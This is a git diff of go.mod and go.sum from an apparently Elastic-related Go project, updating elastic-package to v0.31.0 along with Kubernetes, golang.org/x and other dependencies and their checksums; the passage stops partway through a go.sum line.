diff --git a/go.mod b/go.mod index c9a412fce99..f3ee5403a8c 100644 --- a/go.mod +++ b/go.mod @@ -4,7 +4,7 @@ go 1.17 require ( github.com/blang/semver v3.5.1+incompatible - github.com/elastic/elastic-package v0.29.0 + github.com/elastic/elastic-package v0.31.0 github.com/elastic/package-registry v1.5.1 github.com/magefile/mage v1.11.0 github.com/pkg/errors v0.9.1 
@@ -15,60 +15,61 @@ require ( require ( github.com/AlecAivazis/survey/v2 v2.3.2 // indirect github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 // indirect - github.com/MakeNowJust/heredoc v0.0.0-20170808103936-bb23615498cd // indirect + github.com/MakeNowJust/heredoc v1.0.0 // indirect github.com/Masterminds/semver v1.5.0 // indirect github.com/Masterminds/semver/v3 v3.1.1 // indirect - github.com/Microsoft/go-winio v0.4.17 // indirect - github.com/PaesslerAG/gval v1.0.0 // indirect + github.com/Microsoft/go-winio v0.5.1 // indirect + github.com/PaesslerAG/gval v1.1.2 // indirect github.com/PaesslerAG/jsonpath v0.1.1 // indirect - github.com/ProtonMail/go-crypto v0.0.0-20210920160938-87db9fbc61c7 // indirect + github.com/ProtonMail/go-crypto v0.0.0-20211112122917-428f8eabeeb3 // indirect github.com/ProtonMail/go-mime v0.0.0-20190923161245-9b5a4261663a // indirect - github.com/ProtonMail/gopenpgp/v2 v2.2.5 // indirect + github.com/ProtonMail/gopenpgp/v2 v2.3.0 // indirect github.com/PuerkitoBio/purell v1.1.1 // indirect github.com/PuerkitoBio/urlesc v0.0.0-20170810143723-de5bf2ad4578 // indirect github.com/acomagu/bufpipe v1.0.3 // indirect - github.com/andybalholm/brotli v1.0.3 // indirect + github.com/andybalholm/brotli v1.0.4 // indirect github.com/armon/go-radix v1.0.0 // indirect - github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef // indirect + github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d // indirect github.com/aymerick/raymond v2.0.2+incompatible // indirect github.com/cespare/xxhash/v2 v2.1.2 // indirect + github.com/chai2010/gettext-go v0.0.0-20160711120539-c6fed771bfd5 // indirect github.com/creasty/defaults v1.5.2 // indirect github.com/davecgh/go-spew v1.1.1 // indirect github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 // indirect - github.com/elastic/go-elasticsearch/v7 v7.15.1 // indirect + github.com/elastic/go-elasticsearch/v7 v7.16.0 // indirect github.com/elastic/go-licenser v0.4.0 
// indirect github.com/elastic/go-sysinfo v1.7.1 // indirect github.com/elastic/go-ucfg v0.8.4 // indirect github.com/elastic/go-windows v1.0.1 // indirect github.com/elastic/package-spec v1.3.0 // indirect github.com/emirpasic/gods v1.12.0 // indirect - github.com/evanphx/json-patch v4.11.0+incompatible // indirect - github.com/exponent-io/jsonpath v0.0.0-20151013193312-d6023ce2651d // indirect + github.com/evanphx/json-patch v5.6.0+incompatible // indirect + github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f // indirect github.com/fatih/color v1.13.0 // indirect - github.com/go-errors/errors v1.0.1 // indirect + github.com/go-errors/errors v1.4.1 // indirect github.com/go-git/gcfg v1.5.0 // indirect github.com/go-git/go-billy/v5 v5.3.1 // indirect github.com/go-git/go-git/v5 v5.4.2 // indirect - github.com/go-logr/logr v0.4.0 // indirect - github.com/go-openapi/errors v0.19.8 // indirect + github.com/go-logr/logr v1.2.2 // indirect + github.com/go-openapi/errors v0.20.1 // indirect github.com/go-openapi/jsonpointer v0.19.5 // indirect - github.com/go-openapi/jsonreference v0.19.5 // indirect - github.com/go-openapi/strfmt v0.21.0 // indirect - github.com/go-openapi/swag v0.19.14 // indirect - github.com/go-stack/stack v1.8.0 // indirect + github.com/go-openapi/jsonreference v0.19.6 // indirect + github.com/go-openapi/strfmt v0.21.1 // indirect + github.com/go-openapi/swag v0.19.15 // indirect + github.com/go-stack/stack v1.8.1 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/golang/protobuf v1.5.2 // indirect - github.com/golang/snappy v0.0.2 // indirect + github.com/golang/snappy v0.0.4 // indirect github.com/google/btree v1.0.1 // indirect - github.com/google/go-cmp v0.5.5 // indirect + github.com/google/go-cmp v0.5.6 // indirect github.com/google/go-github/v32 v32.1.0 // indirect github.com/google/go-querystring v1.1.0 // indirect - github.com/google/gofuzz v1.1.0 // indirect + github.com/google/gofuzz v1.2.0 // indirect 
github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect - github.com/google/uuid v1.2.0 // indirect + github.com/google/uuid v1.3.0 // indirect github.com/googleapis/gnostic v0.5.5 // indirect github.com/gorilla/mux v1.8.0 // indirect - github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7 // indirect + github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79 // indirect github.com/imdario/mergo v0.3.12 // indirect github.com/inconshreveable/mousetrap v1.0.0 // indirect github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99 // indirect 
@@ -76,83 +77,85 @@ require ( github.com/jedib0t/go-pretty v4.3.0+incompatible // indirect github.com/joeshaw/multierror v0.0.0-20140124173710-69b34d4ec901 // indirect github.com/josharian/intern v1.0.0 // indirect - github.com/json-iterator/go v1.1.11 // indirect + github.com/json-iterator/go v1.1.12 // indirect github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect - github.com/kevinburke/ssh_config v0.0.0-20201106050909-4977a11b4351 // indirect + github.com/kevinburke/ssh_config v1.1.0 // indirect github.com/klauspost/compress v1.13.6 // indirect github.com/klauspost/pgzip v1.2.5 // indirect github.com/kylelemons/godebug v1.1.0 // indirect github.com/liggitt/tabwriter v0.0.0-20181228230101-89fcab3d43de // indirect - github.com/mailru/easyjson v0.7.6 // indirect - github.com/mattn/go-colorable v0.1.9 // indirect + github.com/mailru/easyjson v0.7.7 // indirect + github.com/mattn/go-colorable v0.1.12 // indirect github.com/mattn/go-isatty v0.0.14 // indirect - github.com/mattn/go-runewidth v0.0.9 // indirect + github.com/mattn/go-runewidth v0.0.13 // indirect github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d // indirect github.com/mholt/archiver/v3 v3.5.1 // indirect github.com/mitchellh/go-homedir v1.1.0 // indirect - github.com/mitchellh/go-wordwrap v1.0.0 // indirect - github.com/mitchellh/mapstructure v1.4.1 // indirect + github.com/mitchellh/go-wordwrap v1.0.1 // indirect + github.com/mitchellh/mapstructure v1.4.3 // indirect github.com/moby/spdystream v0.2.0 // indirect - github.com/moby/term v0.0.0-20210610120745-9d4ed1856297 // indirect + github.com/moby/term v0.0.0-20210619224110-3f7ff695adc6 // indirect github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect - github.com/modern-go/reflect2 v1.0.1 // indirect + github.com/modern-go/reflect2 v1.0.2 // indirect github.com/monochromegane/go-gitignore v0.0.0-20200626010858-205db1a8cc00 // indirect - github.com/nwaples/rardecode v1.1.0 // indirect + 
github.com/nwaples/rardecode v1.1.2 // indirect github.com/oklog/ulid v1.3.1 // indirect github.com/olekukonko/tablewriter v0.0.5 // indirect github.com/peterbourgon/diskv v2.0.1+incompatible // indirect - github.com/pierrec/lz4/v4 v4.1.2 // indirect + github.com/pierrec/lz4/v4 v4.1.12 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect github.com/prometheus/procfs v0.7.3 // indirect - github.com/russross/blackfriday v1.5.2 // indirect + github.com/rivo/uniseg v0.2.0 // indirect + github.com/russross/blackfriday v1.6.0 // indirect github.com/santhosh-tekuri/jsonschema v1.2.4 // indirect - github.com/sergi/go-diff v1.1.0 // indirect + github.com/sergi/go-diff v1.2.0 // indirect github.com/sirupsen/logrus v1.8.1 // indirect github.com/spf13/cobra v1.2.1 // indirect github.com/spf13/pflag v1.0.5 // indirect - github.com/ulikunitz/xz v0.5.9 // indirect - github.com/xanzy/ssh-agent v0.3.0 // indirect + github.com/ulikunitz/xz v0.5.10 // indirect + github.com/xanzy/ssh-agent v0.3.1 // indirect github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb // indirect github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect github.com/xeipuuv/gojsonschema v1.2.0 // indirect github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect - github.com/xlab/treeprint v0.0.0-20181112141820-a009c3971eca // indirect + github.com/xlab/treeprint v1.1.0 // indirect go.elastic.co/apm v1.14.0 // indirect go.elastic.co/apm/module/apmgorilla v1.14.0 // indirect go.elastic.co/apm/module/apmhttp v1.14.0 // indirect go.elastic.co/fastjson v1.1.0 // indirect - go.mongodb.org/mongo-driver v1.7.3 // indirect - go.starlark.net v0.0.0-20200306205701-8dd3e2ee1dd5 // indirect - golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a // indirect + go.mongodb.org/mongo-driver v1.8.1 // indirect + go.starlark.net v0.0.0-20211203141949-70c0e40ae128 // indirect + golang.org/x/crypto v0.0.0-20211209193657-4570a0811e8b // indirect golang.org/x/lint 
v0.0.0-20210508222113-6edffad5e616 // indirect golang.org/x/mod v0.5.1 // indirect - golang.org/x/net v0.0.0-20210805182204-aaa1db679c0d // indirect - golang.org/x/oauth2 v0.0.0-20210402161424-2e8d93401602 // indirect - golang.org/x/sys v0.0.0-20211102192858-4dd72447c267 // indirect - golang.org/x/term v0.0.0-20210503060354-a79de5458b56 // indirect - golang.org/x/text v0.3.6 // indirect - golang.org/x/time v0.0.0-20210723032227-1f47c861a9ac // indirect - golang.org/x/tools v0.1.7 // indirect + golang.org/x/net v0.0.0-20211209124913-491a49abca63 // indirect + golang.org/x/oauth2 v0.0.0-20211104180415-d3ed0bb246c8 // indirect + golang.org/x/sys v0.0.0-20211214150614-024a26f5d6e2 // indirect + golang.org/x/term v0.0.0-20210927222741-03fcf44c2211 // indirect + golang.org/x/text v0.3.7 // indirect + golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11 // indirect + golang.org/x/tools v0.1.8 // indirect golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 // indirect google.golang.org/appengine v1.6.7 // indirect - google.golang.org/protobuf v1.26.0 // indirect + google.golang.org/protobuf v1.27.1 // indirect gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/warnings.v0 v0.1.2 // indirect gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect - helm.sh/helm/v3 v3.7.1 // indirect + helm.sh/helm/v3 v3.7.2 // indirect howett.net/plist v0.0.0-20201203080718-1454fab16a06 // indirect - k8s.io/api v0.22.3 // indirect - k8s.io/apiextensions-apiserver v0.22.1 // indirect - k8s.io/apimachinery v0.22.3 // indirect - k8s.io/cli-runtime v0.22.3 // indirect - k8s.io/client-go v0.22.3 // indirect - k8s.io/component-base v0.22.1 // indirect - k8s.io/klog/v2 v2.9.0 // indirect - k8s.io/kube-openapi v0.0.0-20210421082810-95288971da7e // indirect - k8s.io/kubectl v0.22.1 // indirect - k8s.io/utils v0.0.0-20210819203725-bdf08cb9a70a // indirect - sigs.k8s.io/kustomize/api v0.8.11 // indirect - sigs.k8s.io/kustomize/kyaml v0.11.0 // indirect - sigs.k8s.io/structured-merge-diff/v4 
v4.1.2 // indirect - sigs.k8s.io/yaml v1.2.0 // indirect + k8s.io/api v0.23.0 // indirect + k8s.io/apiextensions-apiserver v0.23.0 // indirect + k8s.io/apimachinery v0.23.0 // indirect + k8s.io/cli-runtime v0.23.0 // indirect + k8s.io/client-go v0.23.0 // indirect + k8s.io/component-base v0.23.0 // indirect + k8s.io/klog/v2 v2.30.0 // indirect + k8s.io/kube-openapi v0.0.0-20211115234752-e816edb12b65 // indirect + k8s.io/kubectl v0.23.0 // indirect + k8s.io/utils v0.0.0-20211208161948-7d6a63dca704 // indirect + sigs.k8s.io/json v0.0.0-20211208200746-9f7c6b3444d2 // indirect + sigs.k8s.io/kustomize/api v0.10.1 // indirect + sigs.k8s.io/kustomize/kyaml v0.13.0 // indirect + sigs.k8s.io/structured-merge-diff/v4 v4.2.0 // indirect + sigs.k8s.io/yaml v1.3.0 // indirect ) diff --git a/go.sum b/go.sum index 0f9577081fa..669da6c65df 100644 --- a/go.sum +++ b/go.sum @@ -61,8 +61,9 @@ github.com/Azure/go-autorest/tracing v0.6.0/go.mod h1:+vhtPC754Xsa23ID7GlGsrdKBp github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= github.com/DATA-DOG/go-sqlmock v1.5.0/go.mod h1:f/Ixk793poVmq4qj/V1dPUg2JEAKC73Q5eFN3EC/SaM= -github.com/MakeNowJust/heredoc v0.0.0-20170808103936-bb23615498cd h1:sjQovDkwrZp8u+gxLtPgKGjk5hCxuy2hrRejBTA9xFU= github.com/MakeNowJust/heredoc v0.0.0-20170808103936-bb23615498cd/go.mod h1:64YHyfSL2R96J44Nlwm39UHepQbyR5q10x7iYa1ks2E= +github.com/MakeNowJust/heredoc v1.0.0 h1:cXCdzVdstXyiTqTvfqk9SDHpKNjxuom+DOlyEeQ4pzQ= +github.com/MakeNowJust/heredoc v1.0.0/go.mod h1:mG5amYoWBHf8vpLOuehzbGGw0EHxpZZ6lCpQ4fNJ8LE= github.com/Masterminds/goutils v1.1.0/go.mod h1:8cTjp+g8YejhMuvIA5y2vz3BpJxksy863GQaJW2MFNU= github.com/Masterminds/goutils v1.1.1/go.mod h1:8cTjp+g8YejhMuvIA5y2vz3BpJxksy863GQaJW2MFNU= github.com/Masterminds/semver v1.5.0 h1:H65muMkzWKEuNDnfl9d70GUjFniHKHRbFPGBuZ3QEww= 
@@ -72,7 +73,7 @@ github.com/Masterminds/semver/v3 v3.1.1 h1:hLg3sBzpNErnxhQtUy/mmLR2I9foDujNK030I github.com/Masterminds/semver/v3 v3.1.1/go.mod h1:VPu/7SZ7ePZ3QOrcuXROw5FAcLl4a0cBrbBpGY/8hQs= github.com/Masterminds/sprig v2.22.0+incompatible/go.mod h1:y6hNFY5UBTIWBxnzTeuNhlNS5hqE0NB0E6fgfo2Br3o= github.com/Masterminds/sprig/v3 v3.2.2/go.mod h1:UoaO7Yp8KlPnJIYWTFkMaqPUYKTfGFPhxNuwnnxkKlk= -github.com/Masterminds/squirrel v1.5.0/go.mod h1:NNaOrjSoIDfDA40n7sr2tPNZRfjzjA400rg+riTZj10= +github.com/Masterminds/squirrel v1.5.2/go.mod h1:NNaOrjSoIDfDA40n7sr2tPNZRfjzjA400rg+riTZj10= github.com/Masterminds/vcs v1.13.1/go.mod h1:N09YCmOQr6RLxC6UNHzuVwAdodYbbnycGHSmwVJjcKA= github.com/Microsoft/go-winio v0.4.11/go.mod h1:VhR8bwka0BXejwEJY73c50VrPtXAaKcyvVC4A4RozmA= github.com/Microsoft/go-winio v0.4.14/go.mod h1:qXqCSQ3Xa7+6tgxaGTIe4Kpcdsi+P8jBhyzoq1bpyYA= 
@@ -81,8 +82,10 @@ github.com/Microsoft/go-winio v0.4.16-0.20201130162521-d1ffc52c7331/go.mod h1:XB github.com/Microsoft/go-winio v0.4.16/go.mod h1:XB6nPKklQyQ7GC9LdcBEcBl8PF76WugXOPRXwdLnMv0= github.com/Microsoft/go-winio v0.4.17-0.20210211115548-6eac466e5fa3/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= github.com/Microsoft/go-winio v0.4.17-0.20210324224401-5516f17a5958/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= -github.com/Microsoft/go-winio v0.4.17 h1:iT12IBVClFevaf8PuVyi3UmZOVh4OqnaLxDTW2O6j3w= github.com/Microsoft/go-winio v0.4.17/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= +github.com/Microsoft/go-winio v0.5.0/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= +github.com/Microsoft/go-winio v0.5.1 h1:aPJp2QD7OOrhO5tQXqQoGSJc+DjDtWTGLOmNyAm6FgY= +github.com/Microsoft/go-winio v0.5.1/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= github.com/Microsoft/hcsshim v0.8.6/go.mod h1:Op3hHsoHPAvb6lceZHDtd9OkTew38wNoXnJs8iY7rUg= github.com/Microsoft/hcsshim v0.8.7-0.20190325164909-8abdbb8205e4/go.mod h1:Op3hHsoHPAvb6lceZHDtd9OkTew38wNoXnJs8iY7rUg= github.com/Microsoft/hcsshim v0.8.7/go.mod h1:OHd7sQqRFrYd3RmSgbgji+ctCwkbq2wbEYNSzOYtcBQ= 
@@ -98,18 +101,19 @@ github.com/NYTimes/gziphandler v1.1.1/go.mod h1:n/CVRwUEOgIxrgPvAQhUUr9oeUtvrhMo github.com/Netflix/go-expect v0.0.0-20180615182759-c93bf25de8e8 h1:xzYJEypr/85nBpB11F9br+3HUrpgb+fcm5iADzXXYEw= github.com/Netflix/go-expect v0.0.0-20180615182759-c93bf25de8e8/go.mod h1:oX5x61PbNXchhh0oikYAH+4Pcfw5LKv21+Jnpr6r6Pc= github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU= -github.com/PaesslerAG/gval v1.0.0 h1:GEKnRwkWDdf9dOmKcNrar9EA1bz1z9DqPIO1+iLzhd8= github.com/PaesslerAG/gval v1.0.0/go.mod h1:y/nm5yEyTeX6av0OfKJNp9rBNj2XrGhAf5+v24IBN1I= +github.com/PaesslerAG/gval v1.1.2 h1:EROKxV4/fAKWb0Qoj7NOxmHZA7gcpjOV9XgiRZMRCUU= +github.com/PaesslerAG/gval v1.1.2/go.mod h1:Fa8gfkCmUsELXgayr8sfL/sw+VzCVoa03dcOcR/if2w= github.com/PaesslerAG/jsonpath v0.1.0/go.mod h1:4BzmtoM/PI8fPO4aQGIusjGxGir2BzcV0grWtFzq1Y8= github.com/PaesslerAG/jsonpath v0.1.1 h1:c1/AToHQMVsduPAa4Vh6xp2U0evy4t8SWp8imEsylIk= github.com/PaesslerAG/jsonpath v0.1.1/go.mod h1:lVboNxFGal/VwW6d9JzIy56bUsYAP6tH/x80vjnCseY= github.com/ProtonMail/go-crypto v0.0.0-20210428141323-04723f9f07d7/go.mod h1:z4/9nQmJSSwwds7ejkxaJwO37dru3geImFUdJlaLzQo= -github.com/ProtonMail/go-crypto v0.0.0-20210920160938-87db9fbc61c7 h1:DSqTh6nEes/uO8BlNcGk8PzZsxY2sN9ZL//veWBdTRI= -github.com/ProtonMail/go-crypto v0.0.0-20210920160938-87db9fbc61c7/go.mod h1:z4/9nQmJSSwwds7ejkxaJwO37dru3geImFUdJlaLzQo= +github.com/ProtonMail/go-crypto v0.0.0-20211112122917-428f8eabeeb3 h1:XcF0cTDJeiuZ5NU8w7WUDge0HRwwNRmxj/GGk6KSA6g= +github.com/ProtonMail/go-crypto v0.0.0-20211112122917-428f8eabeeb3/go.mod h1:z4/9nQmJSSwwds7ejkxaJwO37dru3geImFUdJlaLzQo= github.com/ProtonMail/go-mime v0.0.0-20190923161245-9b5a4261663a h1:W6RrgN/sTxg1msqzFFb+G80MFmpjMw61IU+slm+wln4= github.com/ProtonMail/go-mime v0.0.0-20190923161245-9b5a4261663a/go.mod h1:NYt+V3/4rEeDuaev/zw1zCq8uqVEuPHzDPo3OZrlGJ4= -github.com/ProtonMail/gopenpgp/v2 v2.2.5 h1:5kbOX9bzTxtxLKAQigooQYOthkmqEHZd65gqC2IQlmc= -github.com/ProtonMail/gopenpgp/v2 
v2.2.5/go.mod h1:ygdaHbrbWFPhKjmXii0zOs3/xlSR/01GaVePKqv19Hc= +github.com/ProtonMail/gopenpgp/v2 v2.3.0 h1:eniutitHk02Yn3GtaDfJTVm/Ca1e8s6zkS0SpeaocXI= +github.com/ProtonMail/gopenpgp/v2 v2.3.0/go.mod h1:F62x0m3akQuisX36pOgAtKOHZ1E7/MpnX8bZWCK+5dA= github.com/PuerkitoBio/purell v1.1.1 h1:WEQqlqaGbrPkxLJWfBwQmfEAE1Z7ONdDLqrN38tNFfI= github.com/PuerkitoBio/purell v1.1.1/go.mod h1:c11w/QuzBsJSee3cPx9rAFu61PvFxuPbtSwDGJws/X0= github.com/PuerkitoBio/urlesc v0.0.0-20170810143723-de5bf2ad4578 h1:d+Bc7a5rLufV/sSk/8dngufqelfh6jnri85riMAaF/M= 
@@ -124,11 +128,13 @@ github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRF github.com/alecthomas/units v0.0.0-20190924025748-f65c72e2690d/go.mod h1:rBZYJk541a8SKzHPHnH3zbiI+7dagKZ0cgpgrD7Fyho= github.com/alexflint/go-filemutex v0.0.0-20171022225611-72bdc8eae2ae/go.mod h1:CgnQgUtFrFz9mxFNtED3jI5tLDjKlOM+oUF/sTk6ps0= github.com/andybalholm/brotli v1.0.1/go.mod h1:loMXtMfwqflxFJPmdbJO0a3KNoPuLBgiu3qAvBg8x/Y= -github.com/andybalholm/brotli v1.0.3 h1:fpcw+r1N1h0Poc1F/pHbW40cUm/lMEQslZtCkBQ0UnM= github.com/andybalholm/brotli v1.0.3/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= +github.com/andybalholm/brotli v1.0.4 h1:V7DdXeJtZscaqfNuAdSRuRFzuiKlHSC/Zh3zl9qY3JY= +github.com/andybalholm/brotli v1.0.4/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239 h1:kFOfPq6dUM1hTo4JG6LR5AXSUEsOjtdm0kw0FtQtMJA= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239/go.mod h1:2FmKhYUyUczH0OGQWaF5ceTx0UBShxjsH6f8oGKYe2c= github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= +github.com/antlr/antlr4/runtime/Go/antlr v0.0.0-20210826220005-b48c857c3a0e/go.mod h1:F7bn7fEU90QkQ3tnmaTx3LTKLEDqnwWODIYppRQ5hnY= github.com/armon/circbuf v0.0.0-20150827004946-bbbad097214e/go.mod h1:3U/XgcO3hCbHZ8TKRvWD2dDTCfh9M9ya+I9JpbB7O8o= github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5doyWs3UAsr3K4I6qtAmlQcZDesFNEHPZAzj8= github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da/go.mod h1:Q73ZrmVTwzkszR9V5SSuryQ31EELlFMUz1kKyl939pY= 
@@ -139,13 +145,15 @@ github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5 h1:0CwZNZbxp69SHPd github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5/go.mod h1:wHh0iHkYZB8zMSxRWpUBQtwG5a7fFgvEO+odwuTv2gs= github.com/asaskevich/govalidator v0.0.0-20190424111038-f61b66f89f4a/go.mod h1:lB+ZfQJz7igIIfQNfa7Ml4HSf2uFQQRzpGGRXenZAgY= github.com/asaskevich/govalidator v0.0.0-20200428143746-21a406dcc535/go.mod h1:oGkLhpf+kjZl6xBf758TQhh5XrAeiJv/7FRz/2spLIg= -github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef h1:46PFijGLmAjMPwCCCo7Jf0W6f9slllCkkv7vyc1yOSg= github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= +github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d h1:Byv0BzEl3/e6D5CLfI0j/7hiIEtvGVFPCZ7Ei2oq8iQ= +github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= github.com/aws/aws-sdk-go v1.15.11/go.mod h1:mFuSZ37Z9YOHbQEwBWztmVzqXrEkub65tZoCYDt7FT0= github.com/aws/aws-sdk-go v1.34.9/go.mod h1:5zCpMtNQVjRREroY7sYe8lOMRSxkhG6MZveU8YkpAk0= github.com/aymerick/raymond v2.0.2+incompatible h1:VEp3GpgdAnv9B2GFyTvqgcKvY+mfKMjPOA3SbKLtnU0= github.com/aymerick/raymond v2.0.2+incompatible/go.mod h1:osfaiScAUVup+UC9Nfq76eWqDhXlp+4UYaA8uhTBO6g= github.com/benbjohnson/clock v1.0.3/go.mod h1:bGMdMPoPVvcYyt1gHDf4J2KE153Yf9BuiUKYMaxlTDM= +github.com/benbjohnson/clock v1.1.0/go.mod h1:J11/hYXuz8f4ySSvYwY0FKfm+ezbsZBKZxNJlLklBHA= github.com/beorn7/perks v0.0.0-20160804104726-4c0e84591b9a/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8= 
@@ -174,6 +182,7 @@ github.com/cespare/xxhash v1.1.0/go.mod h1:XrSqR1VqqWfGrhpAt58auRo0WTKS1nRRg3ghf github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/cespare/xxhash/v2 v2.1.2 h1:YRXhKfTDauu4ajMg1TPgFO5jnlC2HCbmLXMcTG5cbYE= github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= +github.com/chai2010/gettext-go v0.0.0-20160711120539-c6fed771bfd5 h1:7aWHqerlJ41y6FOsEUvknqgXnGmJyJSbjhAWq5pO4F8= github.com/chai2010/gettext-go v0.0.0-20160711120539-c6fed771bfd5/go.mod h1:/iP1qXHoty45bqomnu2LM+VVyAEdWN+vtSHGlQgyxbw= github.com/checkpoint-restore/go-criu/v4 v4.1.0/go.mod h1:xUQBLp4RLc5zJtWY++yjOoMoB5lihDt7fai+75m+rGw= github.com/checkpoint-restore/go-criu/v5 v5.0.0/go.mod h1:cfwC0EG7HMUenopBsUf9d89JlCLQIfgVcNsNN0t6T2M= @@ -189,6 +198,7 @@ github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDk github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/cncf/udpa/go v0.0.0-20200629203442-efcf912fb354/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cockroachdb/datadriven v0.0.0-20190809214429-80d97fb3cbaa/go.mod h1:zn76sxSg3SzpJ0PPJaLDCu+Bu0Lg3sKTORVIj19EIF8= github.com/cockroachdb/datadriven v0.0.0-20200714090401-bf6692d28da5/go.mod h1:h6jFvWxBdQXxjopDMZyH2UVceIRfR84bdzbkoKrsWNo= github.com/cockroachdb/errors v1.2.4/go.mod h1:rQD95gz6FARkaKkQXUksEje/d9a6wBJoCr5oaCLELYA= 
@@ -336,10 +346,10 @@ github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5/go.mod h1:qssHWj6 github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= github.com/dustin/go-humanize v0.0.0-20171111073723-bb3d318650d4/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= -github.com/elastic/elastic-package v0.29.0 h1:1HTetQx1z5KHdGLbuqh/LZ5BmmxSGtFY+Qj6pNO3Mfc= -github.com/elastic/elastic-package v0.29.0/go.mod h1:xWp19lTljbZpoUuqSA2GY//b4HrcMVns2WXG3gCP3Is= -github.com/elastic/go-elasticsearch/v7 v7.15.1 h1:Wd8RLHb5D8xPBU8vGlnLXyflkso9G+rCmsXjqH8LLQQ= -github.com/elastic/go-elasticsearch/v7 v7.15.1/go.mod h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= +github.com/elastic/elastic-package v0.31.0 h1:RZAZ/Q6uyvAz/oOALj85zTKs5UZVxuOPlLQJJ0WIY4o= +github.com/elastic/elastic-package v0.31.0/go.mod h1:fSY4v7vQFjxObDaUsWBWwF52z6mWPRjE7NTC65WcPuo= +github.com/elastic/go-elasticsearch/v7 v7.16.0 h1:GHsxDFXIAlhSleXun4kwA89P7kQFADRChqvgOPeYP5A= +github.com/elastic/go-elasticsearch/v7 